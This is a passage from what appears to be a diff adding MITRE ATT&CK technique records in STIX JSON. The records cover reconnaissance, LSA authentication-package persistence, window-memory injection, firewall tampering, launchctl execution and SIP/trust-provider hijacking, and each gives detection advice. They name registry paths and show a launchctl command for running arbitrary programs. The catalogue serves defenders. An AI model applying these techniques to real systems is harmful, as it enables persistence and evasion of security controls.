GitHub Gitrob)(Citation: CNET Leaks)\n\nGathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Phishing for Information](https://attack.mitre.org/techniques/T1598)), establishing operational resources (ex: [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [Phishing](https://attack.mitre.org/techniques/T1566) or [Valid Accounts](https://attack.mitre.org/techniques/T1078)).", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "reconnaissance" + } + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Jannie Li, Microsoft Threat Intelligence Center (MSTIC)", + "Obsidian Security" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Monitor for suspicious network traffic that could be indicative of probing for user information, such as large/iterative quantities of authentication requests originating from a single source (especially if the source is known to be associated with an adversary/botnet). Analyzing web metadata may also reveal artifacts that can be attributed to potentially malicious activity, such as referer or user-agent string HTTP/S fields.\n\nMuch of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "PRE" + ], + "x_mitre_version": "1.3", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--5282dd9a-d26d-4e16-88b7-7c0f4553daf4", + "created": "2020-10-02T14:54:59.263Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1589", + "external_id": "T1589" + }, + { + "source_name": "OPM Leak", + "description": "Cybersecurity Resource Center. (n.d.). CYBERSECURITY INCIDENTS. Retrieved October 20, 2020.", + "url": "https://www.opm.gov/cybersecurity/cybersecurity-incidents/" + }, + { + "source_name": "Detectify Slack Tokens", + "description": "Detectify. (2016, April 28). Slack bot token leakage exposing business critical information. Retrieved October 19, 2020.", + "url": "https://labs.detectify.com/2016/04/28/slack-bot-token-leakage-exposing-business-critical-information/" + }, + { + "source_name": "GitHub truffleHog", + "description": "Dylan Ayrey. (2016, December 31). truffleHog. Retrieved October 19, 2020.", + "url": "https://github.com/dxa4481/truffleHog" + }, + { + "source_name": "GrimBlog UsernameEnum", + "description": "GrimHacker. (2017, July 24). Office365 ActiveSync Username Enumeration. Retrieved December 9, 2021.", + "url": "https://grimhacker.com/2017/07/24/office365-activesync-username-enumeration/" + }, + { + "source_name": "Register Uber", + "description": "McCarthy, K. (2015, February 28). FORK ME! Uber hauls GitHub into court to find who hacked database of 50,000 drivers. Retrieved October 19, 2020.", + "url": "https://www.theregister.com/2015/02/28/uber_subpoenas_github_for_hacker_details/" + }, + { + "source_name": "GitHub Gitrob", + "description": "Michael Henriksen. (2018, June 9). Gitrob: Putting the Open Source in OSINT. Retrieved October 19, 2020.", + "url": "https://github.com/michenriksen/gitrob" + }, + { + "source_name": "CNET Leaks", + "description": "Ng, A. (2019, January 17). Massive breach leaks 773 million email addresses, 21 million passwords. Retrieved October 20, 2020.", + "url": "https://www.cnet.com/news/massive-breach-leaks-773-million-emails-21-million-passwords/" + }, + { + "source_name": "Obsidian SSPR Abuse 2023", + "description": "Noah Corradin and Shuyang Wang. (2023, August 1). Behind The Breach: Self-Service Password Reset (SSPR) Abuse in Azure AD. Retrieved March 28, 2024.", + "url": "https://www.obsidiansecurity.com/blog/behind-the-breach-self-service-password-reset-azure-ad/" + }, + { + "source_name": "Forbes GitHub Creds", + "description": "Sandvik, R. (2014, January 14). Attackers Scrape GitHub For Cloud Service Credentials, Hijack Account To Mine Virtual Currency. Retrieved October 19, 2020.", + "url": "https://www.forbes.com/sites/runasandvik/2014/01/14/attackers-scrape-github-for-cloud-service-credentials-hijack-account-to-mine-virtual-currency/#242c479d3196" + }, + { + "source_name": "Register Deloitte", + "description": "Thomson, I. (2017, September 26). Deloitte is a sitting duck: Key systems with RDP open, VPN and proxy 'login details leaked'. Retrieved October 19, 2020.", + "url": "https://www.theregister.com/2017/09/26/deloitte_leak_github_and_google/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-04-25T14:00:00.188Z", + "name": "Authentication Package", + "description": "Windows Authentication Package DLLs are loaded by the Local Security Authority (LSA) process at system start. They provide support for multiple logon processes and multiple security protocols to the operating system. (Citation: MSDN Authentication Packages)\n\nAdversaries can use the autostart mechanism provided by LSA Authentication Packages for persistence by placing a reference to a binary in the Windows Registry location HKLM\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\ with the key value of \"Authentication Packages\"=. The binary will then be executed by the system when the authentication packages are loaded.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "persistence" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_detection": "Monitor the Registry for changes to the LSA Registry keys. Monitor the LSA process for DLL loads. Windows 8.1 and Windows Server 2012 R2 may generate events when unsigned DLLs try to load into the LSA by setting the Registry key HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\LSASS.exe with AuditLevel = 8. (Citation: Graeber 2014) (Citation: Microsoft Configure LSA)", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "x_mitre_permissions_required": [ + "Administrator" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--52d40641-c480-4ad5-81a3-c80ccaddf82d", + "created": "2017-05-31T21:31:43.135Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": true, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1131", + "external_id": "T1131" + }, + { + "source_name": "MSDN Authentication Packages", + "description": "Microsoft. (n.d.). Authentication Packages. Retrieved March 1, 2017.", + "url": "https://msdn.microsoft.com/library/windows/desktop/aa374733.aspx" + }, + { + "source_name": "Graeber 2014", + "description": "Graeber, M. (2014, October). Analysis of Malicious Security Support Provider DLLs. Retrieved March 1, 2017.", + "url": "http://docplayer.net/20839173-Analysis-of-malicious-security-support-provider-dlls.html" + }, + { + "source_name": "Microsoft Configure LSA", + "description": "Microsoft. (2013, July 31). Configuring Additional LSA Protection. Retrieved June 24, 2015.", + "url": "https://technet.microsoft.com/en-us/library/dn408187.aspx" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-04-25T14:00:00.188Z", + "name": "Extra Window Memory Injection", + "description": "Before creating a window, graphical Windows-based processes must prescribe to or register a windows class, which stipulate appearance and behavior (via windows procedures, which are functions that handle input/output of data). (Citation: Microsoft Window Classes) Registration of new windows classes can include a request for up to 40 bytes of extra window memory (EWM) to be appended to the allocated memory of each instance of that class. This EWM is intended to store data specific to that window and has specific application programming interface (API) functions to set and get its value. (Citation: Microsoft GetWindowLong function) (Citation: Microsoft SetWindowLong function)\n\nAlthough small, the EWM is large enough to store a 32-bit pointer and is often used to point to a windows procedure. Malware may possibly utilize this memory location in part of an attack chain that includes writing code to shared sections of the process’s memory, placing a pointer to the code in EWM, then invoking execution by returning execution control to the address in the process’s EWM.\n\nExecution granted through EWM injection may take place in the address space of a separate live process. Similar to [Process Injection](https://attack.mitre.org/techniques/T1055), this may allow access to both the target process's memory and possibly elevated privileges. Writing payloads to shared sections also avoids the use of highly monitored API calls such as WriteProcessMemory and CreateRemoteThread. (Citation: Elastic Process Injection July 2017) More sophisticated malware samples may also potentially bypass protection mechanisms such as data execution prevention (DEP) by triggering a combination of windows procedures and other system functions that will rewrite the malicious payload inside an executable portion of the target process. (Citation: MalwareTech Power Loader Aug 2013) (Citation: WeLiveSecurity Gapz and Redyms Mar 2013)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "privilege-escalation" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_detection": "Monitor for API calls related to enumerating and manipulating EWM such as GetWindowLong (Citation: Microsoft GetWindowLong function) and SetWindowLong (Citation: Microsoft SetWindowLong function). Malware associated with this technique have also used SendNotifyMessage (Citation: Microsoft SendNotifyMessage function) to trigger the associated window procedure and eventual malicious injection. (Citation: Elastic Process Injection July 2017)", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "x_mitre_defense_bypassed": [ + "Anti-virus", + "Host intrusion prevention systems", + "Data Execution Prevention" + ], + "x_mitre_permissions_required": [ + "Administrator", + "SYSTEM" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--52f3d5a6-8a0f-4f82-977e-750abf90d0b0", + "created": "2018-01-16T16:13:52.465Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": true, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1181", + "external_id": "T1181" + }, + { + "source_name": "Microsoft Window Classes", + "description": "Microsoft. (n.d.). About Window Classes. Retrieved December 16, 2017.", + "url": "https://msdn.microsoft.com/library/windows/desktop/ms633574.aspx" + }, + { + "source_name": "Microsoft GetWindowLong function", + "description": "Microsoft. (n.d.). GetWindowLong function. Retrieved December 16, 2017.", + "url": "https://msdn.microsoft.com/library/windows/desktop/ms633584.aspx" + }, + { + "source_name": "Microsoft SetWindowLong function", + "description": "Microsoft. (n.d.). SetWindowLong function. Retrieved December 16, 2017.", + "url": "https://msdn.microsoft.com/library/windows/desktop/ms633591.aspx" + }, + { + "source_name": "Elastic Process Injection July 2017", + "description": "Hosseini, A. (2017, July 18). Ten Process Injection Techniques: A Technical Survey Of Common And Trending Process Injection Techniques. Retrieved December 7, 2017.", + "url": "https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process" + }, + { + "source_name": "MalwareTech Power Loader Aug 2013", + "description": "MalwareTech. (2013, August 13). PowerLoader Injection – Something truly amazing. Retrieved December 16, 2017.", + "url": "https://www.malwaretech.com/2013/08/powerloader-injection-something-truly.html" + }, + { + "source_name": "WeLiveSecurity Gapz and Redyms Mar 2013", + "description": "Matrosov, A. (2013, March 19). Gapz and Redyms droppers based on Power Loader code. Retrieved December 16, 2017.", + "url": "https://www.welivesecurity.com/2013/03/19/gapz-and-redyms-droppers-based-on-power-loader-code/" + }, + { + "source_name": "Microsoft SendNotifyMessage function", + "description": "Microsoft. (n.d.). SendNotifyMessage function. Retrieved December 16, 2017.", + "url": "https://msdn.microsoft.com/library/windows/desktop/ms644953.aspx" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2024-03-28T00:01:08.337Z", + "name": "Disable or Modify System Firewall", + "description": "Adversaries may disable or modify system firewalls in order to bypass controls limiting network usage. Changes could be disabling the entire mechanism as well as adding, deleting, or modifying particular rules. This can be done numerous ways depending on the operating system, including via command-line, editing Windows Registry keys, and Windows Control Panel.\n\nModifying or disabling a system firewall may enable adversary C2 communications, lateral movement, and/or data exfiltration that would otherwise not be allowed. For example, adversaries may add a new firewall rule for a well-known protocol (such as RDP) using a non-traditional and potentially less securitized port (i.e. [Non-Standard Port](https://attack.mitre.org/techniques/T1571)).(Citation: change_rdp_port_conti)\n\nAdversaries may also modify host networking settings that indirectly manipulate system firewalls, such as interface bandwidth or network connection request thresholds.(Citation: Huntress BlackCat) Settings related to enabling abuse of various [Remote Services](https://attack.mitre.org/techniques/T1021) may also indirectly modify firewall rules.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [], + "x_mitre_deprecated": false, + "x_mitre_detection": "Monitor processes and command-line arguments to see if firewalls are disabled or modified. Monitor Registry edits to keys that manage firewalls.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows", + "Network" + ], + "x_mitre_version": "1.2", + "x_mitre_data_sources": [], + "x_mitre_defense_bypassed": [ + "Firewall" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--5372c5fe-f424-4def-bcd5-d3a8e770f07b", + "created": "2020-02-21T21:00:48.814Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1562/004", + "external_id": "T1562.004" + }, + { + "source_name": "Huntress BlackCat", + "description": "Carvey, H. (2024, February 28). BlackCat Ransomware Affiliate TTPs. Retrieved March 27, 2024.", + "url": "https://www.huntress.com/blog/blackcat-ransomware-affiliate-ttps" + }, + { + "source_name": "change_rdp_port_conti", + "description": "The DFIR Report. (2022, March 1). \"Change RDP port\" #ContiLeaks. Retrieved March 1, 2022.", + "url": "https://twitter.com/TheDFIRReport/status/1498657772254240768" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-05-08T20:13:24.241Z", + "name": "Network Service Scanning", + "description": "Network Service Scanning is the process of discovering services on networked systems. This can be achieved through a technique called port scanning or probing. Port scanning interacts with the TCP/IP ports on a target system to determine whether ports are open, closed, or filtered by a firewall. This does not reveal the service that is running behind the port, but since many common services are run on [https://www.iana.org/assignments/service-names-port-numbers/service-names-port-numbers.xhtml specific port numbers], the type of service can be assumed. More in-depth testing includes interaction with the actual service to determine the service type and specific version. One of the most-popular tools to use for Network Service Scanning is [https://nmap.org/ Nmap].\n\nAn adversary may attempt to gain information about a target device and its role on the network via Network Service Scanning techniques, such as port scanning. Network Service Scanning is useful for determining potential vulnerabilities in services on target devices. Network Service Scanning is closely tied to .\n\nScanning ports can be noisy on a network. In some attacks, adversaries probe for specific ports using custom tools. This was specifically seen in the Triton and PLC-Blaster attacks.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "discovery" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_deprecated": true, + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows", + "Field Controller/RTU/PLC/IED" + ], + "x_mitre_version": "1.0", + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--539d0484-fe95-485a-b654-86991c0d0d00", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-ics-attack", + "url": "https://attack.mitre.org/techniques/T0841", + "external_id": "T0841" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-10-13T17:57:05.190Z", + "name": "Indicator Removal on Host", + "description": "Adversaries may attempt to remove indicators of their presence on a system in an effort to cover their tracks. In cases where an adversary may feel detection is imminent, they may try to overwrite, delete, or cover up changes they have made to the device.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "evasion" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "None" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [ + "Command: Command Execution", + "Process: OS API Execution", + "Windows Registry: Windows Registry Key Modification", + "File: File Metadata", + "Windows Registry: Windows Registry Key Deletion", + "File: File Deletion", + "File: File Modification", + "Process: Process Creation" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--53a26eee-1080-4d17-9762-2027d5a1b805", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0872", + "external_id": "T0872" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-10-13T17:57:05.375Z", + "name": "I/O Image", + "description": "Adversaries may seek to capture process values related to the inputs and outputs of a PLC. During the scan cycle, a PLC reads the status of all inputs and stores them in an image table. (Citation: Nanjundaiah, Vaidyanath) The image table is the PLCs internal storage location where values of inputs/outputs for one scan are stored while it executes the user program. After the PLC has solved the entire logic program, it updates the output image table. The contents of this output image table are written to the corresponding output points in I/O Modules.\n\nThe Input and Output Image tables described above make up the I/O Image on a PLC. This image is used by the user program instead of directly interacting with physical I/O. (Citation: Spenneberg, Ralf 2016) \n\nAdversaries may collect the I/O Image state of a PLC by utilizing a devices [Native API](https://attack.mitre.org/techniques/T0834) to access the memory regions directly. The collection of the PLCs I/O state could be used to replace values or inform future stages of an attack.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "collection" + } + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_contributors": [], + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "None" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--53a48c74-0025-45f4-b04a-baa853df8204", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0877", + "external_id": "T0877" + }, + { + "source_name": "Nanjundaiah, Vaidyanath", + "description": "Nanjundaiah, Vaidyanath PLC Ladder Logic Basics Retrieved. 2021/10/11 ", + "url": "https://www.ezautomation.net/industry-articles/plc-ladder-logic-basics.htm" + }, + { + "source_name": "Spenneberg, Ralf 2016", + "description": "Spenneberg, Ralf 2016 PLC-Blaster Retrieved. 2019/06/06 ", + "url": "https://www.blackhat.com/docs/asia-16/materials/asia-16-Spenneberg-PLC-Blaster-A-Worm-Living-Solely-In-The-PLC.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2024-01-20T00:07:58.958Z", + "name": "Archive Collected Data", + "description": "An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network.(Citation: DOJ GRU Indictment Jul 2018) Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.\n\nBoth compression and encryption are done prior to exfiltration, and can be performed using a utility, 3rd party library, or custom method.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "collection" + } + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [], + "x_mitre_deprecated": false, + "x_mitre_detection": "Archival software and archived files can be detected in many ways. Common utilities that may be present on the system or brought in by an adversary may be detectable through process monitoring and monitoring for command-line arguments for known archival utilities. This may yield a significant number of benign events, depending on how systems in the environment are typically used.\n\nA process that loads the Windows DLL crypt32.dll may be used to perform encryption, decryption, or verification of file signatures.\n\nConsider detecting writing of files with extensions and/or headers associated with compressed or encrypted file types. Detection efforts may focus on follow-on exfiltration activity, where compressed or encrypted files can be detected in transit with a network intrusion detection or data loss prevention system analyzing file headers.(Citation: Wikipedia File Header Signatures)", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--53ac20cd-aca3-406e-9aa0-9fc7fdc60a5a", + "created": "2020-02-20T20:53:45.725Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1560", + "external_id": "T1560" + }, + { + "source_name": "DOJ GRU Indictment Jul 2018", + "description": "Mueller, R. (2018, July 13). Indictment - United States of America vs. VIKTOR BORISOVICH NETYKSHO, et al. Retrieved September 13, 2018.", + "url": "https://www.justice.gov/file/1080281/download" + }, + { + "source_name": "Wikipedia File Header Signatures", + "description": "Wikipedia. (2016, March 31). List of file signatures. Retrieved April 22, 2016.", + "url": "https://en.wikipedia.org/wiki/List_of_file_signatures" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-04-25T14:00:00.188Z", + "name": "Launchctl", + "description": "Launchctl controls the macOS launchd process which handles things like launch agents and launch daemons, but can execute other commands or programs itself. Launchctl supports taking subcommands on the command-line, interactively, or even redirected from standard input. By loading or reloading launch agents or launch daemons, adversaries can install persistence or execute changes they made (Citation: Sofacy Komplex Trojan). Running a command from launchctl is as simple as launchctl submit -l -- /Path/to/thing/to/execute \"arg\" \"arg\" \"arg\". Loading, unloading, or reloading launch agents or launch daemons can require elevated privileges. \n\nAdversaries can abuse this functionality to execute code or even bypass whitelisting if launchctl is an allowed process.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "execution" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "persistence" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_detection": "Knock Knock can be used to detect persistent programs such as those installed via launchctl as launch agents or launch daemons. Additionally, every launch agent or launch daemon must have a corresponding plist file on disk somewhere which can be monitored. Monitor process execution from launchctl/launchd for unusual or unknown processes.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "macOS" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "x_mitre_defense_bypassed": [ + "Application whitelisting", + "Process whitelisting", + "Whitelisting by file name or path" + ], + "x_mitre_permissions_required": [ + "User", + "Administrator" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--53bfc8bf-8f76-4cd7-8958-49a884ddb3ee", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": true, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1152", + "external_id": "T1152" + }, + { + "source_name": "Sofacy Komplex Trojan", + "description": "Dani Creus, Tyler Halfpop, Robert Falcone. (2016, September 26). Sofacy's 'Komplex' OS X Trojan. Retrieved July 8, 2017.", + "url": "https://researchcenter.paloaltonetworks.com/2016/09/unit42-sofacys-komplex-os-x-trojan/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-05-24T14:00:00.188Z", + "name": "SIP and Trust Provider Hijacking", + "description": "Adversaries may tamper with SIP and trust provider components to mislead the operating system and application control tools when conducting signature validation checks. In user mode, Windows Authenticode (Citation: Microsoft Authenticode) digital signatures are used to verify a file's origin and integrity, variables that may be used to establish trust in signed code (ex: a driver with a valid Microsoft signature may be handled as safe). The signature validation process is handled via the WinVerifyTrust application programming interface (API) function, (Citation: Microsoft WinVerifyTrust) which accepts an inquiry and coordinates with the appropriate trust provider, which is responsible for validating parameters of a signature. (Citation: SpectorOps Subverting Trust Sept 2017)\n\nBecause of the varying executable file types and corresponding signature formats, Microsoft created software components called Subject Interface Packages (SIPs) (Citation: EduardosBlog SIPs July 2008) to provide a layer of abstraction between API functions and files. SIPs are responsible for enabling API functions to create, retrieve, calculate, and verify signatures. Unique SIPs exist for most file formats (Executable, PowerShell, Installer, etc., with catalog signing providing a catch-all (Citation: Microsoft Catalog Files and Signatures April 2017)) and are identified by globally unique identifiers (GUIDs). (Citation: SpectorOps Subverting Trust Sept 2017)\n\nSimilar to [Code Signing](https://attack.mitre.org/techniques/T1553/002), adversaries may abuse this architecture to subvert trust controls and bypass security policies that allow only legitimately signed code to execute on a system. Adversaries may hijack SIP and trust provider components to mislead operating system and application control tools to classify malicious (or any) code as signed by: (Citation: SpectorOps Subverting Trust Sept 2017)\n\n* Modifying the Dll and FuncName Registry values in HKLM\\SOFTWARE[\\WOW6432Node\\]Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptSIPDllGetSignedDataMsg\\{SIP_GUID} that point to the dynamic link library (DLL) providing a SIP’s CryptSIPDllGetSignedDataMsg function, which retrieves an encoded digital certificate from a signed file. By pointing to a maliciously-crafted DLL with an exported function that always returns a known good signature value (ex: a Microsoft signature for Portable Executables) rather than the file’s real signature, an adversary can apply an acceptable signature value to all files using that SIP (Citation: GitHub SIP POC Sept 2017) (although a hash mismatch will likely occur, invalidating the signature, since the hash returned by the function will not match the value computed from the file).\n* Modifying the Dll and FuncName Registry values in HKLM\\SOFTWARE\\[WOW6432Node\\]Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptSIPDllVerifyIndirectData\\{SIP_GUID} that point to the DLL providing a SIP’s CryptSIPDllVerifyIndirectData function, which validates a file’s computed hash against the signed hash value. By pointing to a maliciously-crafted DLL with an exported function that always returns TRUE (indicating that the validation was successful), an adversary can successfully validate any file (with a legitimate signature) using that SIP (Citation: GitHub SIP POC Sept 2017) (with or without hijacking the previously mentioned CryptSIPDllGetSignedDataMsg function). This Registry value could also be redirected to a suitable exported function from an already present DLL, avoiding the requirement to drop and execute a new file on disk.\n* Modifying the DLL and Function Registry values in HKLM\\SOFTWARE\\[WOW6432Node\\]Microsoft\\Cryptography\\Providers\\Trust\\FinalPolicy\\{trust provider GUID} that point to the DLL providing a trust provider’s FinalPolicy function, which is where the decoded and parsed signature is checked and the majority of trust decisions are made. Similar to hijacking SIP’s CryptSIPDllVerifyIndirectData function, this value can be redirected to a suitable exported function from an already present DLL or a maliciously-crafted DLL (though the implementation of a trust provider is complex).\n* **Note:** The above hijacks are also possible without modifying the Registry via [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001).\n\nHijacking SIP or trust provider components can also enable persistent code execution, since these malicious components may be invoked by any application that performs code signing or signature validation. (Citation: SpectorOps Subverting Trust Sept 2017)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [ + "Matt Graeber, @mattifestation, SpecterOps" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Periodically baseline registered SIPs and trust providers (Registry entries and files on disk), specifically looking for new, modified, or non-Microsoft entries. (Citation: SpectorOps Subverting Trust Sept 2017)\n\nEnable CryptoAPI v2 (CAPI) event logging (Citation: Entrust Enable CAPI2 Aug 2017) to monitor and analyze error events related to failed trust validation (Event ID 81, though this event can be subverted by hijacked trust provider components) as well as any other provided information events (ex: successful validations). Code Integrity event logging may also provide valuable indicators of malicious SIP or trust provider loads, since protected processes that attempt to load a maliciously-crafted trust validation component will likely fail (Event ID 3033). (Citation: SpectorOps Subverting Trust Sept 2017)\n\nUtilize Sysmon detection rules and/or enable the Registry (Global Object Access Auditing) (Citation: Microsoft Registry Auditing Aug 2016) setting in the Advanced Security Audit policy to apply a global system access control list (SACL) and event auditing on modifications to Registry values (sub)keys related to SIPs and trust providers: (Citation: Microsoft Audit Registry July 2012)\n\n* HKLM\\SOFTWARE\\Microsoft\\Cryptography\\OID\n* HKLM\\SOFTWARE\\WOW6432Node\\Microsoft\\Cryptography\\OID\n* HKLM\\SOFTWARE\\Microsoft\\Cryptography\\Providers\\Trust\n* HKLM\\SOFTWARE\\WOW6432Node\\Microsoft\\Cryptography\\Providers\\Trust\n\n**Note:** As part of this technique, adversaries may attempt to manually edit these Registry keys (ex: Regedit) or utilize the legitimate registration process using [Regsvr32](https://attack.mitre.org/techniques/T1218/010). (Citation: SpectorOps Subverting Trust Sept 2017)\n\nAnalyze Autoruns data for oddities and anomalies, specifically malicious files attempting persistent execution by hiding within auto-starting locations. Autoruns will hide entries signed by Microsoft or Windows by default, so ensure “Hide Microsoft Entries” and “Hide Windows Entries” are both deselected. (Citation: 